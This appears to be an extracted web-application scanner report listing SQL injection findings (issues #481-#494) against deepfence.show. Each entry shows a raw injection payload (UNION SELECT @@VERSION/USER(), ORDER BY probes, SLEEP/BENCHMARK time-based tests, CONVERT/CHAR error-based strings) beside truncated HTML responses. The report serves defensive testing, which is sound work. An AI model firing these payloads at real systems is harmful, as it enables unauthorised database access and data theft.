src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #481\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1' GROUP BY 1,2,--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #482\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #483\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 17--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #484\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io RLIKE (SELECT (CASE WHEN (4346=4347) THEN \n0x61646d696e ELSE 0x28 END)) AND 'Txws'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #485\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 31337--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #486\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'\n)),4,5,6,7,8,9,10,11\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #487\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #488Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioor true--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #489\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #490\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(\n88)+CHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #491\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io -1 UNION SELECT 1 INTO @,@,@\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #492\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK\n(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #493\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io-- -\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #494\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 15#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link 